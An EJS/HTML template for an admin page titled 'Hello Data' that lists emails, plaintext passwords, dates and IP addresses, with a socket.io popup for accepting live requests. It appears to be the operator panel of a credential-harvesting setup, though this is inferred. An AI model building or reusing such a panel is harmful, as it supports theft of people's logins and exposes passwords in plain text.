<html>
  <head>
    <title>Hello Data</title>
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    />
    <script src="/socket.io/socket.io.js"></script>
  </head>
  <body onload="Join()">
    <h1>Hello Data</h1>
    <table class="table">
      <thead>
        <tr>
          <th>Email</th>
          <th>Password</th>
          <th>Date</th>
          <th>IP Address</th>
        </tr>
      </thead>
      <tbody>
        <% for (let i = 0; i < result.length; i++) { %>
        <tr>
          <td><%= result[i].email %></td>
          <td><%= result[i].password %></td>
          <td><%= result[i].date %></td>
          <td><%= result[i].ipAddress %></td>
        </tr>
        <% } %>
      </tbody>
    </table>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <!-- Include Bootstrap JavaScript (Popper.js is required for proper functioning) -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>

    <script>
      const socket = io("ws://localhost:3001/");

      function Join() {
        socket.emit("join", { role: "admin" });
      }
      // Function to send a message to the server
      let myModal;
      function onPageLoad() {
        myModal = new bootstrap.Modal(document.getElementById("exampleModal"));
        // Open the popup automatically when the page loads
        myModal.show();
      }

      socket.on("show_popup", () => {
        onPageLoad();
      });

      function accept() {
        socket.emit("accept_request", { status: "accept" });
        myModal.hide();
      }
    </script>

    <!-- Bootstrap Modal  -->

    <div
      class="modal fade"
      id="exampleModal"
      tabindex="-1"
      aria-labelledby="exampleModalLabel"
      aria-hidden="true"
    >
      <div class="modal-dialog">
        <div class="modal-content">
          <div class="modal-header">
            <h5 class="modal-title" id="exampleModalLabel">Popup Title</h5>
            <button
              type="button"
              class="btn-close"
              data-bs-dismiss="modal"
              aria-label="Close"
            ></button>
          </div>
          <div class="modal-body">
            <!-- Content of the popup -->
            <p>This is a popup content.</p>
          </div>
          <div class="modal-footer">
            <button type="button" class="btn btn-primary" onclick="accept()">
              Accept
            </button>

            <button
              type="button"
              class="btn btn-secondary"
              data-bs-dismiss="modal"
            >
              Close
            </button>
          </div>
        </div>
      </div>
    </div>
    <!-- Bootstrap Modal  -->
  </body>
</html>
